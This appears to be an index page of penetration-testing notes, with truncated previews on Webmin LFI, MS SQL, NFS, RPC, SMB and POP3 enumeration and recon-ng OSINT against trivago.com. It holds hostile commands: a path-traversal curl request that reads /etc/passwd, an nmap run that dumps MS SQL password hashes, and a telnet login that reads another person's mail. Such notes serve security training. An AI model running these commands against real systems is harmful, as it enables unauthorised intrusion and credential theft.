Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

# Information Gathering (OWASP Guide)

<!-- TOC -->

- [Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)](#conduct-search-engine-discoveryreconnaissance-for-information-leakage-otg-info-001)
- [Test Objectives](#test-objectives)
- [How to Test](#how-to-test)
- [Use a search engine to search ...


Score: 0


# Miniserv and webmin Enumeration

## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd

```ShellSession
curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0...


Score: 0


# MS SQL Server Enumeration

- Nmap Information Gathering

```ShellSession
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQL...


Score: 0


# NFS_Enumeration (Network File System).html

- Show Mountable NFS Shares

```ShellSession
nmap -sV --script=nfs-showmount $ip
```...


Score: 0


# OSINT By recon-ng

## Study case (trivago.com)

```Bash
> recon-ng

## now let's add a workspace
> workspaces add trivago.com

## Add the target domain
> add domains trivago.com

## Double check if domain is added
> show domains

## find related hosts to our domain
> load netcraft
> run

## check added h...


Score: 0


# Passive information gathering

<!-- TOC -->

- [Google](#google)
- [Email Harvesting](#email-harvesting)
- [Netcraft](#netcraft)
- [Whois](#whois)
- [Recon-ng](#recon-ng)
- [Search for people](#search-for-people)
- [Search Engine Recon Defenses](#search-engine-recon-defenses)

<!-- /TOC -->

## Google

- use search ter...


Score: 0


# POP3 Enumeration

## Reading other peoples mail

You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet

```ShellSession
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2...


Score: 0


# RPC Enumeration (Remote Procedure Call)

## Connect to an RPC share without a username and password and enumerate privileges

```ShellSession
rpcclient --user="" --command=enumprivs -N $ip
```

## Connect to an RPC share with a username and enumerate privileges

```ShellSession
rpcclient --user="" --command=enumpriv...


Score: 0


# Scanning

## War Dialers

- War dialers dial a sequence of telephone numbers, attempting to locate modem carriers or a secondary dial tone
- Demon dialers dial a single number to conduct a brute-force attack against passwords
- Often, an unprotected modem provides the easiest method for penetrating a network
- Many recent news stories abou...


Score: 0


# SMB Enumeration (Server Message Block)

## Scanning for the NetBIOS Service

```ShellSession
root@kali:~# nmap -v -p 139,445 192.168.1.12 -oG /tmp/smp.txt
```

## Scanning NetBIOS using nbtscan

```ShellSession
root@kali:~# nbtscan -r 192.168.1.12
```

## Null Session Enumeration

```ShellSession
root@kali:~# enum4linux -a 192.16...


Score: 0